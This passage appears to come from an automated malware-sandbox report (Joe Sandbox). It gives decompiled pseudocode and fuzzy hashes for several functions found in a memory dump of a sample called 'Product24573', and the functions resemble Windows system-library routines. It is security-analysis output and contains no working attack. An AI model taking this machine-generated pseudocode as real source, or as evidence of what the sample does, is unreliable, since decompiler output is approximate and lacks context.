							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01112280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0110B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0110FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01117D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E011AFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                          0x011be547
                                          0x011be549
                                          0x011be54f
                                          0x011be553
                                          0x011be557
                                          0x011be55a
                                          0x011be55c
                                          0x011be55f
                                          0x011be561
                                          0x011be567
                                          0x011be56b
                                          0x011be7e2
                                          0x00000000
                                          0x011be571
                                          0x011be575
                                          0x011be577
                                          0x011be57b
                                          0x011be57c
                                          0x011be57d
                                          0x011be57e
                                          0x011be57f
                                          0x011be588
                                          0x011be58f
                                          0x011be591
                                          0x011be592
                                          0x011be592
                                          0x011be596
                                          0x011be59e
                                          0x011be5a0
                                          0x011be5a6
                                          0x011be61d
                                          0x011be61d
                                          0x011be621
                                          0x011be623
                                          0x011be630
                                          0x011be630
                                          0x011be7e6
                                          0x011be7eb
                                          0x011be7ed
                                          0x011be7f4
                                          0x011be7fa
                                          0x011be7ff
                                          0x011be7ff
                                          0x011be80a
                                          0x011be812
                                          0x011be812
                                          0x011be5ab
                                          0x011be5b4
                                          0x011be5b9
                                          0x011be5be
                                          0x011be5c0
                                          0x011be5c2
                                          0x011be5c8
                                          0x011be5c9
                                          0x011be5cb
                                          0x011be5cc
                                          0x011be5d5
                                          0x011be5e4
                                          0x011be5f1
                                          0x011be5f8
                                          0x011be5f8
                                          0x011be5d5
                                          0x011be602
                                          0x011be616
                                          0x011be63d
                                          0x011be644
                                          0x011be64d
                                          0x011be652
                                          0x011be657
                                          0x011be659
                                          0x011be65b
                                          0x011be661
                                          0x011be662
                                          0x011be664
                                          0x011be665
                                          0x011be66e
                                          0x011be67d
                                          0x011be68a
                                          0x011be691
                                          0x011be691
                                          0x011be66e
                                          0x011be6b0
                                          0x00000000
                                          0x011be6b6
                                          0x011be6bd
                                          0x011be6c7
                                          0x011be6d7
                                          0x011be6d9
                                          0x011be6db
                                          0x011be6de
                                          0x011be6e3
                                          0x011be6f3
                                          0x011be6fc
                                          0x011be700
                                          0x011be700
                                          0x011be704
                                          0x011be70a
                                          0x011be70a
                                          0x011be713
                                          0x011be716
                                          0x011be719
                                          0x011be720
                                          0x011be761
                                          0x011be76b
                                          0x011be774
                                          0x011be77a
                                          0x011be77a
                                          0x011be78a
                                          0x011be791
                                          0x011be799
                                          0x011be79b
                                          0x011be79f
                                          0x011be7aa
                                          0x011be7c0
                                          0x011be7ac
                                          0x011be7b2
                                          0x011be7b9
                                          0x011be7b9
                                          0x011be7c7
                                          0x011be806
                                          0x00000000
                                          0x011be7c9
                                          0x011be7d1
                                          0x011be7d8
                                          0x00000000
                                          0x011be7d8
                                          0x00000000
                                          0x00000000
                                          0x011be722
                                          0x011be72e
                                          0x011be748
                                          0x011be74c
                                          0x011be754
                                          0x011be756
                                          0x011be75c
                                          0x011be75c
                                          0x00000000
                                          0x011be75c
                                          0x011be758
                                          0x011be758
                                          0x00000000
                                          0x011be758
                                          0x011be750
                                          0x00000000
                                          0x00000000
                                          0x011be752
                                          0x00000000
                                          0x011be752
                                          0x011be730
                                          0x011be735
                                          0x011be73d
                                          0x011be73f
                                          0x00000000
                                          0x00000000
                                          0x011be741
                                          0x011be741
                                          0x00000000
                                          0x011be741
                                          0x011be739
                                          0x00000000
                                          0x00000000
                                          0x011be73b
                                          0x00000000
                                          0x011be73b
                                          0x011be722
                                          0x011be720
                                          0x011be6b0
                                          0x011be618
                                          0x00000000
                                          0x011be618

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction ID: bdf33cf97a1e5a86b7fc64e534225345987eac89c8fa6a8920153e4bd7ae8ec4
                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction Fuzzy Hash: 049180312057429FE729CF29C981B9BBBE5AF84714F14892DF695CB280E774E904CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011751BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E011751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x11d05f0);
				E0114D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0110EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E011753CA(0);
						return E0114D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0113F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01113690(1, _t117, 0x10d1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0113AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01114620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0113AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0117500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01139860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                          0x011751be
                                          0x011751c3
                                          0x011751c8
                                          0x011751cd
                                          0x011751d0
                                          0x011751d3
                                          0x011751d8
                                          0x011751db
                                          0x011751de
                                          0x011751e0
                                          0x011751e3
                                          0x011751e6
                                          0x011751e8
                                          0x01175342
                                          0x01175351
                                          0x01175356
                                          0x0117535a
                                          0x01175360
                                          0x01175363
                                          0x01175366
                                          0x01175369
                                          0x01175369
                                          0x0117536b
                                          0x0117536b
                                          0x01175370
                                          0x011753a3
                                          0x011753a4
                                          0x011753a6
                                          0x011753ab
                                          0x011753ab
                                          0x011753ae
                                          0x011753ae
                                          0x011753b5
                                          0x011753bf
                                          0x011753bf
                                          0x01175375
                                          0x01175396
                                          0x011753a0
                                          0x011753a0
                                          0x00000000
                                          0x01175396
                                          0x01175377
                                          0x01175379
                                          0x0117537f
                                          0x0117538c
                                          0x01175390
                                          0x00000000
                                          0x01175390
                                          0x011751ee
                                          0x011751f1
                                          0x01175301
                                          0x01175310
                                          0x01175315
                                          0x01175318
                                          0x0117531b
                                          0x01175320
                                          0x0117532e
                                          0x01175331
                                          0x00000000
                                          0x01175331
                                          0x01175328
                                          0x01175329
                                          0x00000000
                                          0x01175329
                                          0x011751fa
                                          0x01175235
                                          0x01175236
                                          0x01175239
                                          0x0117523f
                                          0x01175240
                                          0x01175241
                                          0x01175242
                                          0x01175246
                                          0x01175247
                                          0x0117524e
                                          0x01175251
                                          0x01175267
                                          0x01175269
                                          0x0117526e
                                          0x0117527d
                                          0x0117527e
                                          0x01175281
                                          0x01175282
                                          0x01175287
                                          0x01175288
                                          0x0117528a
                                          0x0117528f
                                          0x01175294
                                          0x00000000
                                          0x00000000
                                          0x0117529a
                                          0x0117529c
                                          0x0117529e
                                          0x0117529e
                                          0x011752a4
                                          0x011752b0
                                          0x00000000
                                          0x00000000
                                          0x011752ba
                                          0x011752bc
                                          0x011752bc
                                          0x011752d4
                                          0x011752d9
                                          0x011752dc
                                          0x011752e1
                                          0x00000000
                                          0x00000000
                                          0x011752e7
                                          0x011752f4
                                          0x00000000
                                          0x011752f4
                                          0x01175270
                                          0x00000000
                                          0x01175270
                                          0x011751fc
                                          0x011751fd
                                          0x01175202
                                          0x01175203
                                          0x01175205
                                          0x0117520a
                                          0x0117520f
                                          0x00000000
                                          0x00000000
                                          0x0117521b
                                          0x01175226
                                          0x0117522b
                                          0x0117521d
                                          0x0117521d
                                          0x01175222
                                          0x01175222
                                          0x0117522d
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: a2baf3dbd2b4dfa1b03c9fe0b6ddc776a13d4458d0ffeedbae57c2deebdd426b
                                          • Instruction ID: e1e92c50bcfc9d9d616a09583041841d6beb51094589bbc025a08524663f00f1
                                          • Opcode Fuzzy Hash: a2baf3dbd2b4dfa1b03c9fe0b6ddc776a13d4458d0ffeedbae57c2deebdd426b
                                          • Instruction Fuzzy Hash: B6516BB1E046099FDB68DFA8C940AADBBBAFF48704F15402DE649EB351DB709901CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E0111B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x11ed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01117D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E011C8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01139E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0113B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0113CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01117D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E011C8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0113AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x11e8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x11e862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x11e8628; // 0x0
							_t116 =  *0x11e862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                          0x0111b94c
                                          0x0111b956
                                          0x0111b95c
                                          0x0111b95e
                                          0x0111b964
                                          0x0111b969
                                          0x0111b96d
                                          0x0111b96d
                                          0x0111b970
                                          0x0111b974
                                          0x0111b97a
                                          0x0111badf
                                          0x0111badf
                                          0x0111bae2
                                          0x0111bae4
                                          0x0111bae6
                                          0x0111baf0
                                          0x01162cb8
                                          0x0111baf6
                                          0x0111baf6
                                          0x0111baf6
                                          0x0111bafd
                                          0x0111bb1f
                                          0x0111bb1f
                                          0x0111baff
                                          0x0111bb00
                                          0x0111bb00
                                          0x0111bb03
                                          0x0111bb03
                                          0x0111bacb
                                          0x0111bacf
                                          0x0111bad0
                                          0x0111bad1
                                          0x0111badc
                                          0x0111badc
                                          0x0111b980
                                          0x0111b980
                                          0x0111b988
                                          0x0111b98b
                                          0x0111b98d
                                          0x0111b990
                                          0x0111b993
                                          0x0111b999
                                          0x0111b99b
                                          0x0111b9a1
                                          0x0111b9a5
                                          0x0111b9aa
                                          0x0111b9b0
                                          0x0111b9bb
                                          0x0111b9c0
                                          0x0111b9c3
                                          0x0111b9ca
                                          0x0111b9cc
                                          0x0111b9cf
                                          0x0111b9d3
                                          0x0111b9d7
                                          0x0111ba94
                                          0x0111ba94
                                          0x0111ba98
                                          0x0111baa3
                                          0x01162ccb
                                          0x0111baa9
                                          0x0111baa9
                                          0x0111baa9
                                          0x0111bab1
                                          0x01162cd5
                                          0x01162cdd
                                          0x01162cdd
                                          0x0111babb
                                          0x0111babc
                                          0x0111bac2
                                          0x0111bac3
                                          0x0111bac3
                                          0x0111bac6
                                          0x00000000
                                          0x0111b9dd
                                          0x0111b9dd
                                          0x0111b9e7
                                          0x0111b9e7
                                          0x0111b9ec
                                          0x0111b9ec
                                          0x0111b9f1
                                          0x0111b9f5
                                          0x0111b9fa
                                          0x0111ba00
                                          0x0111ba0c
                                          0x0111ba10
                                          0x0111ba10
                                          0x0111ba12
                                          0x0111ba18
                                          0x00000000
                                          0x00000000
                                          0x0111bb26
                                          0x0111bb26
                                          0x0111ba1e
                                          0x0111ba1e
                                          0x0111ba23
                                          0x0111ba25
                                          0x0111ba2c
                                          0x0111ba30
                                          0x0111ba35
                                          0x0111ba35
                                          0x0111ba41
                                          0x0111ba46
                                          0x0111ba4c
                                          0x0111ba50
                                          0x0111ba54
                                          0x0111ba6a
                                          0x0111ba6e
                                          0x0111ba70
                                          0x0111ba74
                                          0x0111ba78
                                          0x0111ba7a
                                          0x0111ba7c
                                          0x0111ba8e
                                          0x0111ba90
                                          0x0111ba92
                                          0x0111bb14
                                          0x0111bb14
                                          0x0111bb16
                                          0x0111bb16
                                          0x00000000
                                          0x0111ba7c
                                          0x0111bb0a
                                          0x0111bb0d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0111bb0f

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0111B9A5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 885266447-0
                                          • Opcode ID: 6c5e5083ced099253867167390d2832bf34abecff27d9f7dc1eb4eb60d608da5
                                          • Instruction ID: 5470754f3c01a15653a8aea15f1e5a21db42996ecf751c3eb08a619ffa7e20e1
                                          • Opcode Fuzzy Hash: 6c5e5083ced099253867167390d2832bf34abecff27d9f7dc1eb4eb60d608da5
                                          • Instruction Fuzzy Hash: 75515871A08345CFC728DF68D08092AFBF5FB88604F15497EE99597359E731E840CB96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010FB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E010FB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x11cf7a8);
				E0114D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0114D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0113D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0113F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0114DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0113B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0113B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0113E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
